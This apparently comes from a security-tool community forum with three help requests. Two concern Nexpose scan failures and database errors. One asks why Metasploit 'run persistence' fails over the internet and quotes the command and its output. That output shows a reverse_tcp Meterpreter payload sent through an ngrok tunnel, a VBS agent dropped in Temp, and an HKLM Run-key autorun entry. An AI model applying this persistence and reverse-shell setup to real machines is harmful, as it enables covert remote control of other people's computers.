Knowledge Base

Ask A Question

Questions

4

I have installed and attempted to run and got the logs attached as errors.

Issues with Nexpose community trial. Here's log: 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] Logging initialized. [Name = scanLogger-2] [Level = INFO, WARN, ERROR] [Timezone = America/New_York (Eastern Standard Time, GMT-5:00)] 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Scan for site xxxxxxx.com started by policysup. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Debug logging is not enabled for this scan. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] ACES logging is not enabled. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Enabling of Windows Services is off. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Invulnerable Data Storage is on. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Nmap Host Discovery Ignore TCP Reset is off. 2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Nmap ARP Ping for local networks is on. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] [Engine ID: 3(local)] Checking if engine is online. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] [Engine ID: 3(local)] Engine is online. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Scan for site xxxxxxx.com started by policysup. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Initializing alerters. 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] [Scan ID: 2] Starting scan against xxxxxxx.com with scan template: full-audit-without-web-spider. 2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Initializing alerters. 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine hostname: DESKTOP-CJUFJQT/192.168.1.74 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine serial number: 5CCE875D314BBF7CF792EB8FE72BFF5D1740BEF9 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine version: 6.5.7 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last product update ID: 4239920555 (2018-02-22) 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last content update ID: 3471063746 (2018-02-20) 2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last auto content update ID: 1580990612 (2018-02-28) 2018-03-01T02:14:46 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loading plugins. 2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing WindowsPolicyScanner policy scans. 2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing NotesPolicyScanner policy scans. 2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing web scans. 2018-03-01T02:14:51 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing OraclePolicyScanner policy scans. 2018-03-01T02:14:51 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.nse.CheckProcessor.disableVulnerabilityCheckSynchronization is not configured - returning default value true. 2018-03-01T02:14:54 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 28 Jess rules in module ACCTSCAN 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 38745 Jess rules in module VULNSCAN 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 0 Jess rules in module DOSSCAN 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 38773 Jess rules from 355849 vulnerability checks 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating network scanning globals. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating default services mapper with default-services.properties. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating VMware update mapper with: C:\Program Files\rapid7\nexpose\plugins\java\1\VMwarePatchScanner\1\update-id.properties 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded 160 built-in trusted certificates. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.timeout is not configured - returning default value 3600000. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.socketExceptionLimit is not configured - returning default value 7. 2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.minimumPreference is not configured - returning default value 0.0. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Windows Command Shell 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Quake3 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DHCP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: TDS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RSH 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NNTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Shell Backdoor 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Unreal Tournament 2003 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: VMware Authentication Daemon 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: timeserver 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SymScanEngSSL_50 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NAT-PMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: H.323 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: IMAP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: LDAP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Microsoft Exchange Routing 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Back Orifice 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: XFS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SerComm Config 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Oracle TNS Listener 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Novell Netware 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: FTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: mDNS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HTTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Check Point Topology 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Mydoom 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: BGP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: UUCP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: AS/400 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NetBus v2 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Postgres 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Back Orifice 2000 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SMTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DCE RPC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Kerberos 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: ASF-RMCP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RPC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Quote of the Day 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SIPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SMTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CVS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Character Generator 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Shell Backdoor over SSL 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Telnet 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HP Data Protector 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NNTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: FTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: MySQL 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Zotob Worm FTP Daemon 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SIP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: UPnP-HTTPU 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: POP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CIFS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CIFS Name Service 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SubSeven Trojan 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Rapid7 Agent 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DNS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NetBus v1 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: pcAnywhere 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Canon Uniflow CPCA 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: XWindows 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Rsync 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NDMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Trin00 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: UPnP over HTTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: POPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HP JetDirect Data 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: daytime 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Microsoft SQL Server 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RMI 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: discard 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DCE-RPC over HTTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: IMAPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Zincite 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: LDAPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: DB2 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SSH 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: CCTV-DVR 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: ISAKMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: TFTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: echo 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: SNMP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: AFP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: WDBRPC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Lotus Notes 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: finger 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NFS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: PPTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Sasser backdoor FTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: LPD 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: VNC 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: Steam 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: HTTPS 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: NTP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded protocol helper: RTSP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol helper framework factory version: 1.1 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol helper framework factory version: 1.0 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Crimson v3 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: ident 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded verbose XML protocol fingerprint: ident 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: memcached 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: memcached 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: mongodb 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Oracle Services for Microsoft Transaction Server 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: ormi 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: ProRat Server 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: RDP 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Smart Install 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded XML protocol fingerprint: Service Location 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan startup took 58 seconds 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Non-EPSEC scan 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.isEnabled is not configured - returning default value true. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.expressionsEvaluatorFrequency is not configured - returning default value 60000. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.connectTimeout is not configured - returning default value 30000. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.remoteClosedTimeout is not configured - returning default value 500. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.failureLimit is not configured - returning default value 3. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.networkNode.concurrencyLimit is not configured - returning default value 8. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.networkNode.failureLimit is not configured - returning default value 32. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: IPV4 ARGUMENTS: C:\Program Files\rapid7\nexpose\nse\nmap\nmap.exe --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -sS -sU -O --osscan-guess --max-os-tries 1 -p T:1-1040,1080,1125,1194,1214,1220,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812-1813,1953,1959,2000,2002,2030,2049,2100,2200,2222,2301,2381,2401,2433,2456,2500,2556,2745,3000-3001,3121,3127-3128,3230-3235,3268-3269,3306,3339,3389,3460,3527,4000,4045,4100,4242,4430,4443,4661-4662,4711,4786,4848,5000,5010,5059-5061,5101,5180,5190-5193,5250,5432,5554-5555,5560,5566,5631,5678,5800-5803,5900-6009,6101,6106,6112,6346,6588,6777,7001-7002,7070,7100,7510,7777-7778,8000-8001,8004-8005,8008,8080-8083,8098-8100,8180-8181,8383-8384,8443-8444,8470-8480,8500,8866,8888,9090,9100-9102,9343,9470-9476,9480,9495,9996,9999-10000,10025,10168,11211,12345-12346,13659,16080,18181-18185,18207-18208,18231-18232,19190-19191,20034,22226,27017,27374,27665,31337,32764,32771,33333,49152,49400,50000,51080,51443,54320,60000,60148,63148,U:7,9,11,13,17,19,37,53,67-69,88,111,123,135,137-139,161-162,177,213,259-260,445,464,500,514,520,523,623,631,749-751,1194,1434,1701,1812-1813,1900,2049,2746,3230-3235,3401,4045,4500,4665-4666,4672,5059-5061,5351,5353,5632,6429,7777,9100-9102,11211,17185,18233,23945,26000-26004,26198,27015-27030,27444,27960-27964,30720-30724,31337,32771,34555,44400,47545,49152,54321 --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 -oX - -v 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: IPV6 ARGUMENTS: C:\Program Files\rapid7\nexpose\nse\nmap\nmap.exe --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -sS -sU -O --osscan-guess --max-os-tries 1 -p T:1-1040,1080,1125,1194,1214,1220,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812-1813,1953,1959,2000,2002,2030,2049,2100,2200,2222,2301,2381,2401,2433,2456,2500,2556,2745,3000-3001,3121,3127-3128,3230-3235,3268-3269,3306,3339,3389,3460,3527,4000,4045,4100,4242,4430,4443,4661-4662,4711,4786,4848,5000,5010,5059-5061,5101,5180,5190-5193,5250,5432,5554-5555,5560,5566,5631,5678,5800-5803,5900-6009,6101,6106,6112,6346,6588,6777,7001-7002,7070,7100,7510,7777-7778,8000-8001,8004-8005,8008,8080-8083,8098-8100,8180-8181,8383-8384,8443-8444,8470-8480,8500,8866,8888,9090,9100-9102,9343,9470-9476,9480,9495,9996,9999-10000,10025,10168,11211,12345-12346,13659,16080,18181-18185,18207-18208,18231-18232,19190-19191,20034,22226,27017,27374,27665,31337,32764,32771,33333,49152,49400,50000,51080,51443,54320,60000,60148,63148,U:7,9,11,13,17,19,37,53,67-69,88,111,123,135,137-139,161-162,177,213,259-260,445,464,500,514,520,523,623,631,749-751,1194,1434,1701,1812-1813,1900,2049,2746,3230-3235,3401,4045,4500,4665-4666,4672,5059-5061,5351,5353,5632,6429,7777,9100-9102,11211,17185,18233,23945,26000-26004,26198,27015-27030,27444,27960-27964,30720-30724,31337,32771,34555,44400,47545,49152,54321 --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 -oX - -v -6 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap phase started. 2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap will scan 1024 IP addresses at a time. 2018-03-01T02:15:38 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap scan of 1 IP address starting. 2018-03-01T02:15:39 [INFO] [Thread: Scan 2:nmap:stdin] [Site: xxxxxxx.com] Nmap task Ping Scan started. 2018-03-01T02:15:45 [WARN] [Thread: Scan 2:nmap:stdin] [Site: xxxxxxx.com] NMAP: EXCEPTION: STDIN: java.io.IOException: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[11,1] Message: XML document structures must start and end within the same entity. at com.rapid7.nexpose.scan.nmap.xml.NmapXMLOutputCallback.handle(Unknown Source) ~[nxshared.jar:na] at com.rapid7.nexpose.scan.nmap.NmapInputStreamRunnable.run(Unknown Source) [nxshared.jar:na] at java.lang.Thread.run(Thread.java:745) [na:1.8.0_102] Caused by: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[11,1] Message: XML document structures must start and end within the same entity. at com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.next(XMLStreamReaderImpl.java:596) ~[na:1.8.0_102] at com.rapid7.xml.stax.XMLStreamReaderHelper.getNextSiblingElement(Unknown Source) ~[r7shared.jar:na] ... 3 common frames omitted 2018-03-01T02:15:45 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: PROCESS: EXIT VALUE: 255 2018-03-01T02:15:45 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan failed: java.io.IOException: The Nmap exit value is not zero: 255 at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source) at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source) at com.rapid7.nexpose.scan.Scan.start(Unknown Source) at com.rapid7.nexpose.scan.Scan.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 2018-03-01T02:15:50 [INFO] [Thread: scan-executor-service-5] [Site: xxxxxxx.com] Scan failed: java.io.IOException: The Nmap exit value is not zero: 255 at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source) at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source) at com.rapid7.nexpose.scan.Scan.start(Unknown Source) at com.rapid7.nexpose.scan.Scan.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 2018-03-01T02:15:51 [INFO] [Thread: scan-executor-service-5] [Site: xxxxxxx.com] Scan discovered 0 live devices, 0 vulnerabilities. 2018-03-01T02:16:23 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan discovered 0 live devices, 0 vulnerabilities.

Posted by Sherman about a year ago

1

Reverse TCP persistence doesn't work over internet

Hey guys. I've been playing around with some reverse shells on a couple virtual machines and I've recently gotten it to work over the internet using ngrok to port forward to my local computer, which works great, except for the fact that the "run persistence" attack doesn't work. I've never had problems with "run persistence" when testing on a local network. The command will execute and go through without any errors and it also installs the persistence files on the target, but it doesn't actually execute the persistence script on the target and doesn't report back once the user reboots. If I manually click on the .vbs file on the target, then it'll work and it'll reconnect if I exit the session, so the settings should be good. It still doesn't run the script on start up though. This is the command I run: run persistence -r (IP) -p (port) -i 5 -U -X This is the output: [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DESKTOP-VH5Q39J_20180216.4315/DESKTOP-VH5Q39J_20180216.4315.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11086 [*] Persistent agent script is 99634 bytes long [+] Persistent Script written to C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs [*] Executing script C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs [+] Agent executed with PID 4500 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW What's going on? How do I get it to work? I would really appreciate if you guys could help me out! Thanks in advance!

Posted by Ernst Reberto about a year ago

1

Nexpose nxpgsql FATAL semctl()

Hi. It's problem for me "The Security Console is running in maintenance mode, which enables it to perform necessary internal tasks or to recover from the critical failure of one or more of its subsystems. You will not be able to run scans or generate reports while the Security Console is in maintenance mode. For more information, please see the topic Running VM in Maintenance Mode in the VM Administrator's Guide" nsc.log 2018-02-13T11:09:26 [INFO] [Thread: Security Console] Creating NSC config for database type postgresql. 2018-02-13T11:09:26 [INFO] [Thread: Security Console] Starting up postgresql DB system 2018-02-13T11:09:26 [INFO] [Thread: Security Console] PostgreSQL service status: 0. 2018-02-13T11:09:27 [INFO] [Thread: Security Console] PostgreSQL service status: 1. 2018-02-13T11:09:28 [ERROR] [Thread: Security Console] A critical error occured during initialization org.postgresql.util.PSQLException: FATAL: semctl(12582919, 3, SETVAL, 0) failed: Invalid argument at org.postgresql.core.v3.ConnectionFactoryImpl.doAuthentication(ConnectionFactoryImpl.java:443) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.core.v3.ConnectionFactoryImpl.openConnectionImpl(ConnectionFactoryImpl.java:217) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.core.ConnectionFactory.openConnection(ConnectionFactory.java:52) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.jdbc.PgConnection.<init>(PgConnection.java:216) ~[postgresql-9.4.1212.jar:9.4.1212] Any suggetion. Tnx

Posted by John Sartana about a year ago